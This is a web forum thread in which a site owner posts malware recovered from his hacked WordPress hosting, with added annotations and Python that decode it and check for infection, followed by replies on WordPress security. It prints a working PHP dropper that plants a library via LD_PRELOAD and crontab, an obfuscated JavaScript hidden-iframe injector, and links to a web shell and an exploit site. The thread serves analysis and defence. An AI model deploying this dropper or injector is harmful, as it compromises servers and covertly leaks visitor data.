
Found Hackers code

Discussion in 'Security' started by KangBroke, Sep 12, 2015.

  1. KangBroke (Notable Member)
    #1
    Can anyone help me to decode what this is?
    // First 148 bytes of the dropped shared object: the ELF header plus three program headers.
    // \x7fELF, then EI_CLASS=1 (32-bit), EI_DATA=1 (little-endian), EI_VERSION=1, EI_OSABI=0 at
    // offset 7 (the byte the PHP below overwrites). e_type=3 (ET_DYN, a shared object),
    // e_machine=3 (EM_386), e_shoff=0 (section headers stripped), e_phnum=3: PT_LOAD r-x,
    // PT_LOAD rw- (with a large .bss), PT_DYNAMIC. The rest of the object is not in the post.
    \x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03\x00\x01\x00\x00\x00\x54\x0d\x00\x00\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x03\x00\x28\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x60\x00\x00\xfe\x60\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\x00\x61\x00\x00\x00\x71\x00\x00\x00\x71\x00\x00\xf0\x07\x00\x00\xb0\x61\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00\x00\x61\x00\x00\x00\x71\x00\x00\x00\x71\x00\x00\x90\x00\x00\x00\x90\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00
    Code (markup):

    // Fragment of the dropper: the definitions of $so32 and $so64 (the embedded 32-bit and
    // 64-bit ELF shared objects) come before this point and were not posted in full.
    // intval() saturates at PHP_INT_MAX, so this test is true only on a 32-bit PHP build;
    // on 64-bit, $arch stays unset and the 64-bit object is chosen.
    if (intval("9223372036854775807") == 2147483647)
        $arch = 32;
    $so = $arch == 32 ? $so32 : $so64;
    // Read the first 8 bytes of /usr/bin/host (its ELF identification) and copy byte 7,
    // EI_OSABI, into the dropped object. glibc's loader refuses a shared object whose OS ABI
    // tag it does not accept ("ELF file OS ABI invalid"), so the object is given whatever tag
    // a binary that already runs on this system carries.
    $f = fopen("/usr/bin/host", "rb");
    if ($f) {
        $n = unpack("C*", fread($f, 8));   // unpack("C*") indexes from 1, so $n[8] is offset 7
        $so[7] = sprintf("%c", $n[8]);
        fclose($f);
    }
    // Drop the library under a name that blends into a web directory.
    $n = file_put_contents("./jquery.so", $so);
    // Host name and request path of the infected site, handed to the library through the
    // AU environment variable.
    $AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
    $HBN=basename("/usr/bin/host");
    $SCP=getcwd();
    // 1.sh: kill any running "host", start /usr/bin/host with the library preloaded so that
    // the library's code runs inside that process (which shows up in ps as /usr/bin/host),
    // strip the crontab entry that launched the script (grep -v crontab also drops the header
    // lines some cron implementations add), then delete the script itself.
    @file_put_contents("1.sh", "#!/bin/sh\ncd '".$SCP."'\nif [ -f './jquery.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./jquery.so\n/usr/bin/host\nunset LD_PRELOAD\ncrontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n");
    @chmod("1.sh", 0777);
    // Launch attempt 1: an at(1) job. Success is detected by 1.sh having deleted itself.
    @system("at now -f 1.sh", $ret);
    if ($ret == 0) {
        for ($i = 0; $i < 5; $i++) {
            if (! @file_exists("1.sh")) {
                print "AT success\n";
                exit(0);
            }
            sleep(1);
        }
    }
    // Launch attempt 2: a crontab entry that fires every minute (1.sh removes it again).
    @system("(crontab -l|grep -v crontab;echo;echo '* * * * * ".$SCP."/1.sh')|crontab", $ret);
    if ($ret == 0) {
        for ($i = 0; $i < 62; $i++) {
            if (! @file_exists("1.sh")) {
                print "CRONTAB success\n";
                exit(0);
            }
            sleep(1);
        }
    }
    // Launch attempt 3: run it directly under the web server's own user.
    @system("./1.sh");
    @unlink("1.sh");
    // The whole chain (LD_PRELOAD into /usr/bin/host, the AU variable, 1.sh installed via
    // at or crontab) matches the dropper described for the Mayhem *nix web-server malware
    // ("Mayhem: a hidden threat for *nix web servers", Virus Bulletin, 2014).
    ?>
    
    Code (markup):

    KangBroke, Sep 12, 2015 IP
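    As an added illustration (example code written for this page, not part of the post): the escape string at the top of post #1 is the start of an ELF file, and the PHP line `$so[7] = sprintf("%c", $n[8]);` rewrites exactly one byte of it, the EI_OSABI tag at offset 7. The Python below parses those 148 bytes as an ELF32 header plus program headers and then mirrors the patch on a constructed host-binary header tagged ELFOSABI_GNU (3). It handles only the 32-bit format the posted bytes use; the rest of the object was not posted, so only the headers can be read.

```python
"""Parse the ELF header bytes from post #1 and reproduce the dropper's EI_OSABI patch."""
import struct

# The escape string at the top of post #1, as bytes: an ELF header (52 bytes) followed by
# three 32-byte program headers. The rest of the object was not posted.
POSTED = (
    b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x03\x00\x03\x00\x01\x00\x00\x00\x54\x0d\x00\x00\x34\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x03\x00\x28\x00"
    b"\x00\x00\x00\x00"
    b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\xfe\x60\x00\x00\xfe\x60\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00"
    b"\x01\x00\x00\x00\x00\x61\x00\x00\x00\x71\x00\x00\x00\x71\x00\x00"
    b"\xf0\x07\x00\x00\xb0\x61\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00"
    b"\x02\x00\x00\x00\x00\x61\x00\x00\x00\x71\x00\x00\x00\x71\x00\x00"
    b"\x90\x00\x00\x00\x90\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00"
)

E_TYPE = {0: "ET_NONE", 1: "ET_REL", 2: "ET_EXEC", 3: "ET_DYN", 4: "ET_CORE"}
E_MACHINE = {3: "EM_386", 40: "EM_ARM", 62: "EM_X86_64"}
P_TYPE = {0: "PT_NULL", 1: "PT_LOAD", 2: "PT_DYNAMIC", 3: "PT_INTERP", 4: "PT_NOTE", 6: "PT_PHDR", 7: "PT_TLS"}
OSABI = {0: "ELFOSABI_SYSV", 3: "ELFOSABI_GNU"}


def parse_elf32(data):
    """Decode the ELF32 header and program headers; section headers are not needed here."""
    if data[:4] != b"\x7fELF":
        raise ValueError("no ELF magic")
    if data[4] != 1:  # EI_CLASS: 1 = ELFCLASS32
        raise ValueError("only ELFCLASS32 is handled; the posted object is 32-bit")
    end = "<" if data[5] == 1 else ">"  # EI_DATA: 1 = little-endian
    (e_type, e_machine, _ver, e_entry, e_phoff, e_shoff, _flags, _ehsize,
     e_phentsize, e_phnum, _shentsize, e_shnum, _shstrndx) = struct.unpack(end + "HHIIIIIHHHHHH", data[16:52])
    phdrs = []
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, p_offset, p_vaddr, _paddr, p_filesz, p_memsz, p_flags, p_align = struct.unpack(end + "8I", data[off:off + 32])
        phdrs.append({
            "type": P_TYPE.get(p_type, hex(p_type)), "offset": p_offset, "vaddr": p_vaddr,
            "filesz": p_filesz, "memsz": p_memsz, "align": p_align,
            "flags": "".join(name for name, bit in (("r", 4), ("w", 2), ("x", 1)) if p_flags & bit),
        })
    return {
        "osabi": data[7], "osabi_name": OSABI.get(data[7], hex(data[7])),
        "e_type": E_TYPE.get(e_type, hex(e_type)), "e_machine": E_MACHINE.get(e_machine, hex(e_machine)),
        "e_entry": e_entry, "e_shoff": e_shoff, "e_shnum": e_shnum, "phdrs": phdrs,
    }


def patch_osabi(so, host_binary):
    """Mirror `$so[7] = sprintf("%c", $n[8])`: copy EI_OSABI from a binary that already loads."""
    if host_binary[:4] != b"\x7fELF":
        raise ValueError("host binary is not ELF")
    return so[:7] + bytes([host_binary[7]]) + so[8:]


if __name__ == "__main__":
    info = parse_elf32(POSTED)
    print("%s %s osabi=%s entry=%#x shoff=%d (0: section headers stripped)" % (
        info["e_type"], info["e_machine"], info["osabi_name"], info["e_entry"], info["e_shoff"]))
    for ph in info["phdrs"]:
        print("  %-10s off=%#06x vaddr=%#06x filesz=%#06x memsz=%#06x %s" % (
            ph["type"], ph["offset"], ph["vaddr"], ph["filesz"], ph["memsz"], ph["flags"]))
    # Constructed ident of a /usr/bin/host tagged ELFOSABI_GNU (3); only byte 7 matters to the patch.
    gnu_host = b"\x7fELF\x01\x01\x01\x03" + b"\x00" * 8
    print("after the dropper's patch: osabi =", parse_elf32(patch_osabi(POSTED, gnu_host))["osabi_name"])
```

    The second PT_LOAD segment's memsz (0x61b0) is far larger than its filesz (0x7f0), and e_shoff is 0: a stripped, hand-packed object with a large zero-initialised data area, which is what you would expect of an embedded implant rather than a distribution-built library.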
  2. KangBroke (Notable Member)
    #2
    <script type="text/javascript">
    // Obfuscated loader: `a` is a %XX-escaped HTML fragment in which every character has
    // been XORed with 2. The loop undoes the XOR, unescape() restores the markup and
    // document.write() injects it. Decoded, it appends a 0x0 iframe whose src is an
    // external URL that receives document.referrer, document.title and location.host.
    var a = "'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;" +
            "'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--" +
            "'00'02)'02'00a33l6,'00'02)'02'00k,vg'00'02)'02'00cq'00'02)'02'00gpe'00'02)'02'00wkf'00'02)'02'00g,a'00'02)'02'00mo'00'02)'02'00-" +
            "qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";
    var b = "", c = "";
    var clen = a.length;
    for (i = 0; i < clen; i++) { b += String.fromCharCode(a.charCodeAt(i) ^ 2); }
    c = unescape(b);
    document.write(c);
    </script>
    Code (markup):
     
    KangBroke, Sep 12, 2015 IP
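    Added example, not code from the post: the script in post #2 XORs each character of `a` with 2 and runs unescape() on the result, so it can be decoded offline without executing it. The Python below reproduces that transform on the posted string (reassembled across the forum's line wraps), emulating JavaScript's unescape() for %XX and %uXXXX rather than using urllib's UTF-8 decoder, and then folds the decoded `"h" + "tt" + ...` concatenation into a single URL template so the iframe's destination can be read off. Variables in the concatenation are kept as {placeholders}; nothing here contacts the host it names.

```python
"""Decode the XOR-2 payload from post #2 and recover where its hidden iframe points."""
import re
from urllib.parse import urlsplit

# The string assigned to `a` in post #2, with the forum's line wraps removed.
OBFUSCATED = (
    "'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;"
    "'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--"
    "'00'02)'02'00a33l6,'00'02)'02'00k,vg'00'02)'02'00cq'00'02)'02'00gpe'00'02)'02'00wkf'00'02)'02'00g,a'00'02)'02'00mo'00'02)'02'00-"
    "qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G"
)

ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(s):
    """JavaScript's unescape(): %XX and %uXXXX become single code points (no UTF-8 decoding)."""
    return ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def deobfuscate(a):
    """The same transform the loader runs: XOR every code unit with 2, then unescape()."""
    return js_unescape("".join(chr(ord(ch) ^ 2) for ch in a))


def resolve_iframe_src(js):
    """Fold the `"h" + "tt" + ... + host` concatenation into one URL template.
    String literals are joined; bare identifiers become {name}. Returns None if no iframe.src."""
    m = re.search(r"iframe\.src\s*=\s*(.*?);", js)
    if not m:
        return None
    out = []
    for part in m.group(1).split("+"):
        part = part.strip()
        if len(part) >= 2 and part[0] == part[-1] and part[0] in "\"'":
            out.append(part[1:-1])
        else:
            out.append("{" + part + "}")
    return "".join(out)


def summarize(a):
    """Decode a payload and report the injected iframe's target host and whether it is hidden."""
    js = deobfuscate(a)
    url = resolve_iframe_src(js)
    return {
        "url": url,
        "host": urlsplit(url).hostname if url else None,
        "hidden": "iframe.width=0" in js and "iframe.height=0" in js,
        "writes_document": "document.write" in js or "appendChild" in js,
    }


if __name__ == "__main__":
    print(deobfuscate(OBFUSCATED))
    for key, value in summarize(OBFUSCATED).items():
        print("%s: %s" % (key, value))
```

    The decoded markup reports the referring page, the page title and the infected host to the external endpoint, which is how this kind of injection feeds an SEO or traffic-selling operation; the 0x0 iframe keeps it invisible to a visitor, which matches the later comment in the thread that nothing looked wrong when the site was opened by hand.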
  3. fisasti (Active Member)
    #3
    Basically the script is creating a bash file, adding it to the crontab and making sure it executes without any errors. Could you search for the jquery.so file and the 1.sh and post their contents here?
     
    fisasti, Apr 19, 2016 IP
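    An added example of the checks fisasti's request points at; this is not code from the thread. The dropper in post #1 keeps its crontab entry only until 1.sh has run (the script strips its own line from the crontab), so on a live box the durable indicators are the jquery.so file, the 1.sh launcher if it failed to delete itself, and a `/usr/bin/host` process carrying LD_PRELOAD and AU in its environment. The crontab text, process records and file contents below are constructed so that each check fires once; on a real system they would come from `crontab -l` for each user, /proc/<pid>/cmdline, environ and maps, and a walk of the web root.

```python
"""Triage checks for the dropper in post #1, run on constructed sample data."""
import re

ELF_MAGIC = b"\x7fELF"
WEB_DIRS = ("public_html", "/www/", "/htdocs/")

# Constructed crontab: a nightly job, a benign every-minute job outside the web root,
# and the entry the dropper installs ("* * * * * <cwd>/1.sh").
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * * /usr/lib/monitor/check.sh
* * * * * /home/site/public_html/wp-content/uploads/1.sh
"""

# Constructed process records in the shape of /proc/<pid>/cmdline, environ and maps.
SAMPLE_PROCESSES = [
    {"pid": 1402, "cmdline": "/usr/sbin/apache2 -k start",
     "environ": {"PATH": "/usr/sbin:/usr/bin"},
     "maps": "/usr/sbin/apache2\n/lib/libc.so.6"},
    {"pid": 2210, "cmdline": "/usr/bin/host",
     "environ": {"LD_PRELOAD": "./jquery.so", "AU": "example.com/wp-content/uploads/x.php"},
     "maps": "/usr/bin/host\n/home/site/public_html/wp-content/uploads/jquery.so\n/lib/libc.so.6"},
]

# Constructed file contents from the web root (the first bytes are enough for these checks).
SAMPLE_FILES = {
    "/home/site/public_html/wp-content/uploads/jquery.so": ELF_MAGIC + b"\x01\x01\x01\x00" + b"\x00" * 8 + b"\x03\x00\x03\x00",
    "/home/site/public_html/wp-includes/js/jquery/jquery.js": b"/*! jQuery v1.11.3 */",
    "/home/site/public_html/wp-content/uploads/1.sh": (
        b"#!/bin/sh\ncd '/home/site/public_html/wp-content/uploads'\n"
        b"if [ -f './jquery.so' ];then killall -9 host;export AU='example.com/'\n"
        b"export LD_PRELOAD=./jquery.so\n/usr/bin/host\nunset LD_PRELOAD\n"),
}

EVERY_MINUTE = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s+(\S+)")


def in_web_dir(path):
    return any(marker in path for marker in WEB_DIRS)


def suspicious_cron_lines(text):
    """Every-minute jobs whose command lives under a web document root."""
    hits = []
    for line in text.splitlines():
        m = EVERY_MINUTE.match(line)
        if m and in_web_dir(m.group(1)):
            hits.append(line)
    return hits


def suspicious_processes(procs):
    """Processes that look like the preloaded /usr/bin/host: a relative LD_PRELOAD, the AU
    marker, or a shared object mapped from a web directory. Returns (pid, cmdline, reasons)."""
    hits = []
    for p in procs:
        reasons = []
        preload = p["environ"].get("LD_PRELOAD")
        if preload and not preload.startswith("/"):
            reasons.append("LD_PRELOAD=" + preload)
        if "AU" in p["environ"]:
            reasons.append("AU marker in environment")
        for mapped in p["maps"].splitlines():
            if mapped.endswith(".so") and in_web_dir(mapped):
                reasons.append("maps " + mapped)
        if reasons:
            hits.append((p["pid"], p["cmdline"], reasons))
    return hits


def suspicious_files(files):
    """Web-root files that are ELF objects, or scripts that preload a library into /usr/bin/host."""
    hits = []
    for path, data in files.items():
        if data.startswith(ELF_MAGIC):
            hits.append((path, "ELF object under the web root"))
        elif b"LD_PRELOAD=" in data and b"/usr/bin/host" in data:
            hits.append((path, "launcher preloading a library into /usr/bin/host"))
    return hits


if __name__ == "__main__":
    for line in suspicious_cron_lines(SAMPLE_CRONTAB):
        print("cron:", line)
    for pid, cmd, reasons in suspicious_processes(SAMPLE_PROCESSES):
        print("pid %d (%s): %s" % (pid, cmd, "; ".join(reasons)))
    for path, why in suspicious_files(SAMPLE_FILES):
        print("file:", path, "-", why)
```

    The process check is the one that survives a completed install: the library runs inside a process whose command line is just `/usr/bin/host`, so a plain process listing looks normal and the environment and memory maps have to be read. A `host` process that outlives a DNS lookup, or one owned by the web server's user, is worth the same look.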
  4. KangBroke (Notable Member)
    #4
    It has been over a year; I removed all suspicious code and files and swapped hosting. I think my second post was the jquery.so file. It was structured to use multiple files; I found several with similar names which should never have been there. I looked at all my logs and did as much research as I could in my free time.

    It appears to me that someone managed to gain access through a WP install. I had 2 adult sites using WP, and they were being brute-force attacked all day, every day, by person(s) using different IP addresses and trying every login name in the dictionary. It was also triggering GoDaddy bandwidth alerts.
     
    KangBroke, Apr 19, 2016 IP
  5. Kyle Hicks (Active Member)
    #5
    Bro, this is the end of your site. I experienced the same and Google labeled my site as "hacked". It's downhill from there. If Google noticed it, your URL is history. No way you will get your site back. Do the search for your URL in Google and see if you come up with the label "hacked site". WP is crap, to be honest. If I were you, I'd switch to Weebly paid, because it converts your site into static HTML, or just create a static site in text files. That's the only way. These hacks will keep coming back. I also installed the Sucuri firewall at some point, but I think it's stupid; it was blocking Google bots and real traffic from potential clients.... So there is no way to hide, only if you have a static site. Also, hosting your static site on the server is bad. You need to go with something like Amazon S3 or Google Cloud. If you have a database and web server, it will still come back and "bite you in the a***"....
     
    Kyle Hicks, Apr 19, 2016 IP
  6. KangBroke (Notable Member)
    #6
    Not true, google Pissing Impossible.com

    I am no longer using WP; I just had it up for 2 adult sites. Now they are no longer WP.


    There are others on DP that would argue that you are completely wrong about WP. I personally won't use it anymore. But some swear by it.
     
    Last edited by a moderator: Apr 19, 2016
    KangBroke, Apr 19, 2016 IP
  7. Kyle Hicks (Active Member)
    #7
    The best course of action was moving site content by hand, completely destroying my previous site. If you think this is the only place with a hack, you would be wrong. They use base64 encoding where nobody can even see what's happening. In my case Google was triggering it, and when you opened the site yourself you did not see anything wrong, but boy, what was indexing in Google... You need to take it very seriously. I know a company in India that specializes in these kinds of issues. They know how to hack and reverse it. If you'd like I can hook you up...

    WP is crap and will always be crap.... sorry that's the reality :) If you think otherwise - I wish you the best of luck making money online, you will need lots of it.... :):):)
     
    Kyle Hicks, Apr 19, 2016 IP
  8. PoPSiCLe (Illustrious Member)
    #8
    While WP _is_ crap for a lot of reasons, getting hacked isn't really one of them, as long as you make sure the plugins you use are safe and being upgraded, and keep the installation itself upgraded; also, install something that makes the basic login and such a bit more secure, and of course make sure that the host itself hasn't got a hundred security holes (i.e., not a shared host, preferably). Yes, there are hundreds/thousands of hacked WP blogs, but that is mostly due to lack of knowledge on the part of the hosts or owners.

    While a properly coded solution (proprietary code) is usually a better choice, there's no way to know it's more secure; the only reason it's not being hacked is because nobody knows about it (security by obscurity).
     
    PoPSiCLe, Apr 19, 2016 IP
  9. KangBroke (Notable Member)
    #9
    See, I just put up a WP to have some fast content; I didn't really care too much about the site, honestly, it was more of a backburner project. I was being brute-force attacked; you could see someone trying every login username imaginable. I did install a plugin to block the IPs of failed login attempts. I also used a list of banned IPs from a popular website which lists them. They eventually won; it wasn't really that hard to guess, honestly. I learned from it. Again, I don't think WP is complete crap, but I am learning that I trust my own code more than relying on well-known code used by WP.

    I agree with you that WP can be more secure if you take the time to do so; one of the easiest things to do is recode the login page so they cannot find it so easily.
     
    KangBroke, Apr 19, 2016 IP
  10. KangBroke (Notable Member)
    #10

    That is exactly what I did: I swapped hosts, one website at a time. I never said that was the only place; I said that was how they gained access. They did get into the root of my hosting and did infect every folder. I had to hand-pick it out. There are still 2-3 websites which I didn't finish, so they are not up yet.

    I was seeing plenty wrong, it was Russian Cialis ads all over my site.

    I agree with Popsicle that WP is not total crap, it can be used properly.

    Again, as I said, I most likely won't be using WP anymore, but I do feel that the code can be secured and not be as vulnerable. I won't be needing luck making money online; I do just fine.
     
    KangBroke, Apr 19, 2016 IP
  11. Kyle Hicks (Active Member)
    #11
    Oh well, I am guessing you have never seen someone installing a text file with PHP through your WordPress contact page and getting total access to your database and the admin of your WP, or even better, to your entire server :)....

    Have you seen one of these: https://sourceforge.net/projects/cyber-shell/ - your browser will trigger an "alert", but don't worry, this site is safe; they let you download a wonderful piece of code.... There are even 5-star reviews from "users"... LOL...

    Or perhaps another beautiful site - http://0day.today/

    I am a programmer and I also was delusional about a "perfect world", just like you are.... until I lost my extremely profitable online business..... Now I have learned every single tool they use and I can tell you WP is crap... Real crap...

    Nothing is safe... Where there are computers, there are loopholes. There are lots and lots of loopholes in client/server applications. People live by discovering these loopholes because they make tons of money from doing that.

    The only solution is Amazon S3 or similar and static HTML files. That's pretty much your only option to be safe from hacking.... Many smart people are doing just that.

    I wrote a program that takes HTML from WordPress and converts it all into static HTML. I don't understand why WP is not doing it these days. I guess the WP people couldn't care less....

    Here we go :)

    http://www.blackhatworld.com/blackh...3d-muslim-cyb3r-sh3llz-any-idea-how-undo.html


    If you'd like, back up your WordPress site and play with one of these to see how WP is "bullet proof"...
     
    Last edited: Apr 19, 2016
    Kyle Hicks, Apr 19, 2016 IP
  12. orrden (Greenhorn)
    #12
    ExploitDB is your friend for finding out if software is vulnerable. I check it weekly for the web-based software I use, and I check it before purchasing ANY web-based software.
     
    orrden, Apr 19, 2016 IP
  13. PoPSiCLe (Illustrious Member)
    #13
    Right. If you allow for uploads and access, don't secure your server, and make sure you don't have loopholes running circles, then of course it's dangerous. Personally, I would prefer if WP did a redesign on their DB-behavior as well, but that is possible to mitigate with a bit of creative coding - however that means redoing core-files, which is usually beyond most people.
    However, running whitelists, making sure that passwords and logins are secure, actually running through "5 steps to secure your WP-install" and making sure you don't run a hundred plugins you don't need takes away most of the trouble.
     
    PoPSiCLe, Apr 20, 2016 IP
  14. Nigel Lew (Notable Member)
    #14
    I solved, quite literally, all my WP issues with this stuff: https://wordpress.org/plugins/ninjafirewall/ It has a frankly non-existent footprint, unlike stuff like BulletProof Security.

    It also totally helps to find the remaining bits of shifty shit on your machine as well.
     
    Nigel Lew, Apr 20, 2016 IP
  15. matt_62 (Notable Member)
    #15
    @op, I am glad it is now sorted for you. Vulnerabilities can still exist even without WordPress. In addition to the normal backup methods, be sure to take regular ones and store them offline. This way, you can mitigate any serious problems quickly by wiping everything and restoring a reliable backup.

    Adult sites are "high risk" and tend to be targeted more than your typical website. That said, nearly all WordPress sites have been under attack at some stage. I personally use various security plugins; Wordfence is one of them.

    What I like to do is this. Do not use "admin"; use another name. Set Wordfence (or another plugin) to instantly ban any IP logging in with "non-registered usernames". So as soon as they try to log in with "admin", they get banned. I had hundreds of attack attempts, all instantly banned as they all used "admin".

    I do find that if you are running multiple WordPress websites, it is best to use a different cPanel account for each one. The reason I say this is that I have seen people with 10+ WordPress sites on a single cPanel account, and when they got hacked, it was a complete disaster for them. Vulnerabilities in themes or plugins can be exploited, and you don't want one weakness on one website to destroy your entire online presence.
     
    matt_62, Apr 20, 2016 IP